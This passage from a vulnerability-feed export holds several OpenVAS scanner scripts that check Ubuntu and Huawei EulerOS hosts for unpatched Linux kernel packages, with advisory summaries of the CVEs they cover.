"http://plugins.openvas.org/nasl.php?oid=1361412562310842692", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Ubuntu Update for linux USN-2929-1\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2016 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.842692\");\n script_version(\"$Revision: 14140 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-13 13:26:09 +0100 (Wed, 13 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2016-03-15 06:36:52 +0100 (Tue, 15 Mar 2016)\");\n script_cve_id(\"CVE-2016-3134\", \"CVE-2013-4312\", \"CVE-2015-7566\", \"CVE-2015-7833\",\n\t\t\"CVE-2016-0723\", \"CVE-2016-2384\", \"CVE-2016-2543\", \"CVE-2016-2544\",\n\t\t\"CVE-2016-2545\", \"CVE-2016-2546\", \"CVE-2016-2547\", \"CVE-2016-2548\",\n\t\t\"CVE-2016-2549\", \"CVE-2016-2782\");\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Ubuntu Update for linux USN-2929-1\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'linux'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"insight\", value:\"Ben Hawkes discovered that the Linux\n netfilter implementation did not correctly perform validation when handling\n IPT_SO_SET_REPLACE events. A local unprivileged attacker could use this to\n cause a denial of service (system crash) or possibly execute arbitrary code\n with administrative privileges. (CVE-2016-3134)\n\n It was discovered that the Linux kernel did not properly enforce rlimits\n for file descriptors sent over UNIX domain sockets. A local attacker could\n use this to cause a denial of service. (CVE-2013-4312)\n\n Ralf Spenneberg discovered that the USB driver for Clie devices in the\n Linux kernel did not properly sanity check the endpoints reported by the\n device. An attacker with physical access could cause a denial of service\n (system crash). (CVE-2015-7566)\n\n Ralf Spenneberg discovered that the usbvision driver in the Linux kernel\n did not properly sanity check the interfaces and endpoints reported by the\n device. An attacker with physical access could cause a denial of service\n (system crash). (CVE-2015-7833)\n\n It was discovered that a race condition existed in the ioctl handler for\n the TTY driver in the Linux kernel. A local attacker could use this to\n cause a denial of service (system crash) or expose sensitive information.\n (CVE-2016-0723)\n\n Andrey Konovalov discovered that the ALSA USB MIDI driver incorrectly\n performed a double-free. A local attacker with physical access could use\n this to cause a denial of service (system crash) or possibly execute\n arbitrary code with administrative privileges. (CVE-2016-2384)\n\n Dmitry Vyukov discovered that the Advanced Linux Sound Architecture (ALSA)\n framework did not verify that a FIFO was attached to a client before\n attempting to clear it. A local attacker could use this to cause a denial\n of service (system crash). (CVE-2016-2543)\n\n Dmitry Vyukov discovered that a race condition existed in the Advanced\n Linux Sound Architecture (ALSA) framework between timer setup and closing\n of the client, resulting in a use-after-free. A local attacker could use\n this to cause a denial of service. (CVE-2016-2544)\n\n Dmitry Vyukov discovered a race condition in the timer handling\n implementation of the Advanced Linux Sound Architecture (ALSA) framework,\n resulting in a use-after-free. A local attacker could use this to cause a\n denial of service (system crash). (CVE-2016-2545)\n\n Dmitry Vyukov discovered race conditions in the Advanced Linux Sound\n Architecture (ALSA) framework's timer ioctls leading to a use-after-free. A\n local attacker could use this to cause a denial of service (system crash)\n or possibly execute arbitrary code. (CVE-2016-2546)\n\n Dmitry Vyukov discovered that the Adva ...\n\n Description truncated, please see the referenced URL(s) for more information.\");\n script_tag(name:\"affected\", value:\"linux on Ubuntu 14.04 LTS\");\n script_tag(name:\"solution\", value:\"Please Install the Updated Packages.\");\n\n script_xref(name:\"USN\", value:\"2929-1\");\n script_xref(name:\"URL\", value:\"http://www.ubuntu.com/usn/usn-2929-1/\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2016 Greenbone Networks GmbH\");\n script_family(\"Ubuntu Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/ubuntu_linux\", \"ssh/login/packages\", re:\"ssh/login/release=UBUNTU14\\.04 LTS\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nrelease = dpkg_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"UBUNTU14.04 LTS\")\n{\n\n if ((res = isdpkgvuln(pkg:\"linux-image-3.13.0-83-generic\", ver:\"3.13.0-83.127\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-3.13.0-83-generic-lpae\", ver:\"3.13.0-83.127\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-3.13.0-83-lowlatency\", ver:\"3.13.0-83.127\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-3.13.0-83-powerpc-e500\", ver:\"3.13.0-83.127\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-3.13.0-83-powerpc-e500mc\", ver:\"3.13.0-83.127\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-3.13.0-83-powerpc-smp\", ver:\"3.13.0-83.127\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-3.13.0-83-powerpc64-emb\", ver:\"3.13.0-83.127\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-3.13.0-83-powerpc64-smp\", ver:\"3.13.0-83.127\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:35:11", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2016-03-15T00:00:00", "type": "openvas", "title": "Ubuntu Update for linux-lts-vivid USN-2932-1", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-2384", "CVE-2016-2782", "CVE-2016-2543", "CVE-2016-2069", "CVE-2016-2548", "CVE-2016-0723", "CVE-2016-2547", "CVE-2016-2544", "CVE-2016-2545", "CVE-2015-7833", "CVE-2015-8767", "CVE-2013-4312", "CVE-2016-2546", "CVE-2015-7566", "CVE-2016-2549", "CVE-2016-3134"], "modified": "2019-03-13T00:00:00", "id": "OPENVAS:1361412562310842686", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310842686", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Ubuntu Update for linux-lts-vivid USN-2932-1\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2016 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.842686\");\n script_version(\"$Revision: 14140 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-13 13:26:09 +0100 (Wed, 13 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2016-03-15 06:36:05 +0100 (Tue, 15 Mar 2016)\");\n script_cve_id(\"CVE-2016-3134\", \"CVE-2013-4312\", \"CVE-2015-7566\", \"CVE-2015-7833\",\n \t \"CVE-2015-8767\", \"CVE-2016-0723\", \"CVE-2016-2069\", \"CVE-2016-2384\",\n\t \"CVE-2016-2543\", \"CVE-2016-2544\", \"CVE-2016-2545\", \"CVE-2016-2546\",\n\t\t\"CVE-2016-2547\", \"CVE-2016-2548\", \"CVE-2016-2549\", \"CVE-2016-2782\");\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Ubuntu Update for linux-lts-vivid USN-2932-1\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'linux-lts-vivid'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"insight\", value:\"Ben Hawkes discovered that the Linux\n netfilter implementation did not correctly perform validation when handling\n IPT_SO_SET_REPLACE events. A local unprivileged attacker could use this to\n cause a denial of service (system crash) or possibly execute arbitrary code\n with administrative privileges. (CVE-2016-3134)\n\n It was discovered that the Linux kernel did not properly enforce rlimits\n for file descriptors sent over UNIX domain sockets. A local attacker could\n use this to cause a denial of service. (CVE-2013-4312)\n\n Ralf Spenneberg discovered that the USB driver for Clie devices in the\n Linux kernel did not properly sanity check the endpoints reported by the\n device. An attacker with physical access could cause a denial of service\n (system crash). (CVE-2015-7566)\n\n Ralf Spenneberg discovered that the usbvision driver in the Linux kernel\n did not properly sanity check the interfaces and endpoints reported by the\n device. An attacker with physical access could cause a denial of service\n (system crash). (CVE-2015-7833)\n\n It was discovered that a race condition existed when handling heartbeat-\n timeout events in the SCTP implementation of the Linux kernel. A remote\n attacker could use this to cause a denial of service. (CVE-2015-8767)\n\n It was discovered that a race condition existed in the ioctl handler for\n the TTY driver in the Linux kernel. A local attacker could use this to\n cause a denial of service (system crash) or expose sensitive information.\n (CVE-2016-0723)\n\n Andy Lutomirski discovered a race condition in the Linux kernel's\n translation lookaside buffer (TLB) handling of flush events. A local\n attacker could use this to cause a denial of service or possibly leak\n sensitive information. (CVE-2016-2069)\n\n Andrey Konovalov discovered that the ALSA USB MIDI driver incorrectly\n performed a double-free. A local attacker with physical access could use\n this to cause a denial of service (system crash) or possibly execute\n arbitrary code with administrative privileges. (CVE-2016-2384)\n\n Dmitry Vyukov discovered that the Advanced Linux Sound Architecture (ALSA)\n framework did not verify that a FIFO was attached to a client before\n attempting to clear it. A local attacker could use this to cause a denial\n of service (system crash). (CVE-2016-2543)\n\n Dmitry Vyukov discovered that a race condition existed in the Advanced\n Linux Sound Architecture (ALSA) framework between timer setup and closing\n of the client, resulting in a use-after-free. A local attacker could use\n this to cause a denial of service. (CVE-2016-2544)\n\n Dmitry Vyukov discovered a race condition in the timer handling\n implementation of the Advanced Linux S ...\n\n Description truncated, please see the referenced URL(s) for more information.\");\n script_tag(name:\"affected\", value:\"linux-lts-vivid on Ubuntu 14.04 LTS\");\n script_tag(name:\"solution\", value:\"Please Install the Updated Packages.\");\n\n script_xref(name:\"USN\", value:\"2932-1\");\n script_xref(name:\"URL\", value:\"http://www.ubuntu.com/usn/usn-2932-1/\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2016 Greenbone Networks GmbH\");\n script_family(\"Ubuntu Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/ubuntu_linux\", \"ssh/login/packages\", re:\"ssh/login/release=UBUNTU14\\.04 LTS\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nrelease = dpkg_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"UBUNTU14.04 LTS\")\n{\n\n if ((res = isdpkgvuln(pkg:\"linux-image-3.19.0-56-generic\", ver:\"3.19.0-56.62~14.04.1\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-3.19.0-56-generic-lpae\", ver:\"3.19.0-56.62~14.04.1\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-3.19.0-56-lowlatency\", ver:\"3.19.0-56.62~14.04.1\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-3.19.0-56-powerpc-e500mc\", ver:\"3.19.0-56.62~14.04.1\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-3.19.0-56-powerpc-smp\", ver:\"3.19.0-56.62~14.04.1\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-3.19.0-56-powerpc64-emb\", ver:\"3.19.0-56.62~14.04.1\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-3.19.0-56-powerpc64-smp\", ver:\"3.19.0-56.62~14.04.1\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-02-05T16:36:42", "description": "The remote host is missing an update for the Huawei EulerOS\n ", "cvss3": {}, "published": "2020-01-23T00:00:00", "type": "openvas", "title": "Huawei EulerOS: Security Advisory for kernel (EulerOS-SA-2019-1524)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-2782", "CVE-2015-2925", "CVE-2014-4699", "CVE-2017-7889", "CVE-2016-2548", "CVE-2017-11472", "CVE-2017-17975", "CVE-2018-5995", "CVE-2018-5953", "CVE-2014-6416", "CVE-2014-9922", "CVE-2018-18559", "CVE-2014-9584", "CVE-2016-9756", "CVE-2018-14617", "CVE-2017-6346", "CVE-2015-0275", "CVE-2014-9892", "CVE-2013-7026", "CVE-2014-7970"], "modified": "2020-02-05T00:00:00", "id": "OPENVAS:1361412562311220191524", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562311220191524", "sourceData": "# Copyright (C) 2020 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) the respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.1.2.2019.1524\");\n script_version(\"2020-02-05T08:56:28+0000\");\n script_cve_id(\"CVE-2013-7026\", \"CVE-2014-4699\", \"CVE-2014-6416\", \"CVE-2014-7970\", \"CVE-2014-9584\", \"CVE-2014-9892\", \"CVE-2014-9922\", \"CVE-2015-0275\", \"CVE-2015-2925\", \"CVE-2016-2548\", \"CVE-2016-2782\", \"CVE-2016-9756\", \"CVE-2017-11472\", \"CVE-2017-17975\", \"CVE-2017-6346\", \"CVE-2017-7889\", \"CVE-2018-14617\", \"CVE-2018-18559\", \"CVE-2018-5953\", \"CVE-2018-5995\");\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2020-02-05 08:56:28 +0000 (Wed, 05 Feb 2020)\");\n script_tag(name:\"creation_date\", value:\"2020-01-23 12:04:13 +0000 (Thu, 23 Jan 2020)\");\n script_name(\"Huawei EulerOS: Security Advisory for kernel (EulerOS-SA-2019-1524)\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2020 Greenbone Networks GmbH\");\n script_family(\"Huawei EulerOS Local Security Checks\");\n script_dependencies(\"gb_huawei_euleros_consolidation.nasl\");\n script_mandatory_keys(\"ssh/login/euleros\", \"ssh/login/rpms\", re:\"ssh/login/release=EULEROSVIRTARM64-3\\.0\\.1\\.0\");\n\n script_xref(name:\"EulerOS-SA\", value:\"2019-1524\");\n script_xref(name:\"URL\", value:\"https://developer.huaweicloud.com/ict/en/site-euleros/euleros/security-advisories/EulerOS-SA-2019-1524\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the Huawei EulerOS\n 'kernel' package(s) announced via the EulerOS-SA-2019-1524 advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"In the Linux kernel through 4.19, a use-after-free can occur due to a race condition between fanout_add from setsockopt and bind on an AF_PACKET socket. This issue exists because of the 15fe076edea787807a7cdc168df832544b58eba6 incomplete fix for a race condition. The code mishandles a certain multithreaded case involving a packet_do_bind unregister action followed by a packet_notifier register action. Later, packet_release operates on only one of the two applicable linked lists. The attacker can achieve Program Counter control.(CVE-2018-18559)\n\nThe acpi_ns_terminate() function in drivers/acpi/acpica/nsutils.c in the Linux kernel before 4.12 does not flush the operand cache and causes a kernel stack dump. A local users could obtain sensitive information from kernel memory and bypass the KASLR protection mechanism (in the kernel through 4.9) via a crafted ACPI table.(CVE-2017-11472)\n\nRace condition in net/packet/af_packet.c in the Linux kernel allows local users to cause a denial of service (use-after-free) or possibly have unspecified other impact via a multithreaded application that makes PACKET_FANOUT setsockopt system calls.(CVE-2017-6346)\n\nMultiple race conditions in ipc/shm.c in the Linux kernel before 3.12.2 allow local users to cause a denial of service (use-after-free and system crash) or possibly have unspecified other impact via a crafted application that uses shmctl IPC_RMID operations in conjunction with other shm system calls.(CVE-2013-7026)\n\nAn issue was discovered in the Linux kernel. A NULL pointer dereference and panic in hfsplus_lookup() in the fs/hfsplus/dir.c function can occur when opening a file (that is purportedly a hard link) in an hfs+ filesystem that has malformed catalog data, and is mounted read-only without a metadata directory.(CVE-2018-14617)\n\nThe treo_attach function in drivers/usb/serial/visor.c in the Linux kernel before 4.5 allows physically proximate attackers to cause a denial of service (NULL pointer dereference and system crash) or possibly have unspecified other impact by inserting a USB device that lacks a (1) bulk-in or (2) interrupt-in endpoint.(CVE-2016-2782)\n\nAn information-exposure flaw was found in the Linux kernel where the pcpu_embed_first_chunk() function in mm/percpu.c allows local users to obtain kernel-object address information by reading the kernel log (dmesg). However, this address is not static and cannot be used to commit a further attack.(CVE-2018-5995)\n\nBuffer overflow in net/ceph/auth_x.c in Ceph, as used in the Linux kernel before 3.16.3, allows remote attackers to cause a denial of service (memory corruption a ...\n\n Description truncated. Please see the references for more information.\");\n\n script_tag(name:\"affected\", value:\"'kernel' package(s) on Huawei EulerOS Virtualization for ARM 64 3.0.1.0.\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"EULEROSVIRTARM64-3.0.1.0\") {\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel\", rpm:\"kernel~4.19.28~1.2.117\", rls:\"EULEROSVIRTARM64-3.0.1.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-devel\", rpm:\"kernel-devel~4.19.28~1.2.117\", rls:\"EULEROSVIRTARM64-3.0.1.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-headers\", rpm:\"kernel-headers~4.19.28~1.2.117\", rls:\"EULEROSVIRTARM64-3.0.1.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-tools\", rpm:\"kernel-tools~4.19.28~1.2.117\", rls:\"EULEROSVIRTARM64-3.0.1.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-tools-libs\", rpm:\"kernel-tools-libs~4.19.28~1.2.117\", rls:\"EULEROSVIRTARM64-3.0.1.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-tools-libs-devel\", rpm:\"kernel-tools-libs-devel~4.19.28~1.2.117\", rls:\"EULEROSVIRTARM64-3.0.1.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"perf\", rpm:\"perf~4.19.28~1.2.117\", rls:\"EULEROSVIRTARM64-3.0.1.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"python-perf\", rpm:\"python-perf~4.19.28~1.2.117\", rls:\"EULEROSVIRTARM64-3.0.1.0\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if (__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:35:37", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2016-05-10T00:00:00", "type": "openvas", "title": "Ubuntu Update for linux-ti-omap4 USN-2967-2", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-2782", "CVE-2016-2543", "CVE-2016-2069", "CVE-2016-2847", "CVE-2016-2548", "CVE-2016-0723", "CVE-2016-0774", "CVE-2016-2547", "CVE-2015-8812", "CVE-2016-2544", "CVE-2016-0821", "CVE-2015-7515", "CVE-2016-2545", "CVE-2015-7833", "CVE-2015-8767", "CVE-2013-4312", "CVE-2016-2546", "CVE-2015-7566", "CVE-2016-2549", "CVE-2015-1805"], "modified": "2019-03-13T00:00:00", "id": "OPENVAS:1361412562310842735", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310842735", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Ubuntu Update for linux-ti-omap4 USN-2967-2\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2016 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.842735\");\n script_version(\"$Revision: 14140 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-13 13:26:09 +0100 (Wed, 13 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2016-05-10 05:20:13 +0200 (Tue, 10 May 2016)\");\n script_cve_id(\"CVE-2013-4312\", \"CVE-2015-7515\", \"CVE-2015-7566\", \"CVE-2015-7833\",\n \t\t\"CVE-2015-8767\", \"CVE-2015-8812\", \"CVE-2016-0723\", \"CVE-2015-1805\",\n \t\t\"CVE-2016-0774\", \"CVE-2016-0821\", \"CVE-2016-2069\", \"CVE-2016-2543\",\n\t \t\"CVE-2016-2544\", \"CVE-2016-2545\", \"CVE-2016-2546\", \"CVE-2016-2547\",\n \t\t\"CVE-2016-2548\", \"CVE-2016-2549\", \"CVE-2016-2782\", \"CVE-2016-2847\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Ubuntu Update for linux-ti-omap4 USN-2967-2\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'linux-ti-omap4'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"insight\", value:\"It was discovered that the Linux kernel\n did not properly enforce rlimits for file descriptors sent over UNIX domain\n sockets. A local attacker could use this to cause a denial of service.\n (CVE-2013-4312)\n\n Ralf Spenneberg discovered that the Aiptek Tablet USB device driver in the\n Linux kernel did not properly sanity check the endpoints reported by the\n device. An attacker with physical access could cause a denial of service\n (system crash). (CVE-2015-7515)\n\n Ralf Spenneberg discovered that the USB driver for Clie devices in the\n Linux kernel did not properly sanity check the endpoints reported by the\n device. An attacker with physical access could cause a denial of service\n (system crash). (CVE-2015-7566)\n\n Ralf Spenneberg discovered that the usbvision driver in the Linux kernel\n did not properly sanity check the interfaces and endpoints reported by the\n device. An attacker with physical access could cause a denial of service\n (system crash). (CVE-2015-7833)\n\n It was discovered that a race condition existed when handling heartbeat-\n timeout events in the SCTP implementation of the Linux kernel. A remote\n attacker could use this to cause a denial of service. (CVE-2015-8767)\n\n Venkatesh Pottem discovered a use-after-free vulnerability in the Linux\n kernel's CXGB3 driver. A local attacker could use this to cause a denial of\n service (system crash) or possibly execute arbitrary code. (CVE-2015-8812)\n\n It was discovered that a race condition existed in the ioctl handler for\n the TTY driver in the Linux kernel. A local attacker could use this to\n cause a denial of service (system crash) or expose sensitive information.\n (CVE-2016-0723)\n\n It was discovered that the Linux kernel did not keep accurate track of pipe\n buffer details when error conditions occurred, due to an incomplete fix for\n CVE-2015-1805. A local attacker could use this to cause a denial of service\n (system crash) or possibly execute arbitrary code with administrative\n privileges. (CVE-2016-0774)\n\n Zach Riggle discovered that the Linux kernel's list poison feature did not\n take into account the mmap_min_addr value. A local attacker could use this\n to bypass the kernel's poison-pointer protection mechanism while attempting\n to exploit an existing kernel vulnerability. (CVE-2016-0821)\n\n Andy Lutomirski discovered a race condition in the Linux kernel's\n translation lookaside buffer (TLB) handling of flush events. A local\n attacker could use this to cause a denial of service or possibly leak\n sensitive information. (CVE-2016-2069)\n\n Dmitry Vyukov discovered that the Advanced Linux Sound Architecture (ALSA)\n framework did not verify that a FIFO was attached to a c ...\n\n Description truncated, please see the referenced URL(s) for more information.\");\n script_tag(name:\"affected\", value:\"linux-ti-omap4 on Ubuntu 12.04 LTS\");\n script_tag(name:\"solution\", value:\"Please Install the Updated Packages.\");\n\n script_xref(name:\"USN\", value:\"2967-2\");\n script_xref(name:\"URL\", value:\"http://www.ubuntu.com/usn/usn-2967-2/\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2016 Greenbone Networks GmbH\");\n script_family(\"Ubuntu Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/ubuntu_linux\", \"ssh/login/packages\", re:\"ssh/login/release=UBUNTU12\\.04 LTS\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nrelease = dpkg_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"UBUNTU12.04 LTS\")\n{\n\n if ((res = isdpkgvuln(pkg:\"linux-image-3.2.0-1480-omap4\", ver:\"3.2.0-1480.106\", rls:\"UBUNTU12.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:35:50", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2016-05-10T00:00:00", "type": "openvas", "title": "Ubuntu Update for linux USN-2967-1", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-2782", "CVE-2016-2543", "CVE-2016-2069", "CVE-2016-2847", "CVE-2016-2548", "CVE-2016-0723", "CVE-2016-0774", "CVE-2016-2547", "CVE-2015-8812", "CVE-2016-2544", "CVE-2016-0821", "CVE-2015-7515", "CVE-2016-2545", "CVE-2015-7833", "CVE-2015-8767", "CVE-2013-4312", 